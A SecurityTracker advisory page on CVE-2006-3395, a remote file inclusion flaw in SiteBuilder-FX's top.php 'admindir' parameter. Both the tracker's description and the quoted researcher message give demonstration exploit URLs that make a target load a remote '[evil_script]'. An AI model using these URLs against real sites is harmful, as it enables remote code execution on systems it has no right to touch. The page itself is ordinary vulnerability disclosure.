SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Forum/Board/Portal)  >   SiteBuilder-FX Vendors:   WebDesignHQ.com
SiteBuilder-FX Include File Error in 'top.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016417
SecurityTracker URL:  http://securitytracker.com/id/1016417
CVE Reference:   CVE-2006-3395   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jul 1 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   MazaGi reported a vulnerability in SiteBuilder-FX. A remote user can include and execute arbitrary code on the target system.

The 'top.php' script does not properly validate user-supplied input in the 'admindir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/sitebuilder/admin/top.php?admindir=[evil_script]

http://[target]/introbuilder/admin/top.php?admindir=[evil_script]

The original advisory is available at:

http://www.jaascois.com/exploits/18602017/

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.webdesignhq.com (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SiteBuilder-FX ( top.php ) Remote File Include Vulnerabilities

/////////////////////////////////////////////////////////
//
// by: MazaGi [  e55@hotmail.com ]
// ref: http://www.jaascois.com/exploits/18602017/
//
//
// SiteBuilder-FX ( top.php ) Remote File Include Vulnerabilities
// Home: http://www.webdesignhq.com/
// Exploit:
//  http://www.site.com/sitebuilder/admin/top.php?admindir=[evil_script]
//  http://www.site.com/introbuilder/admin/top.php?admindir=[evil_script]
//
/////////////////////////////////////////////////////////
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC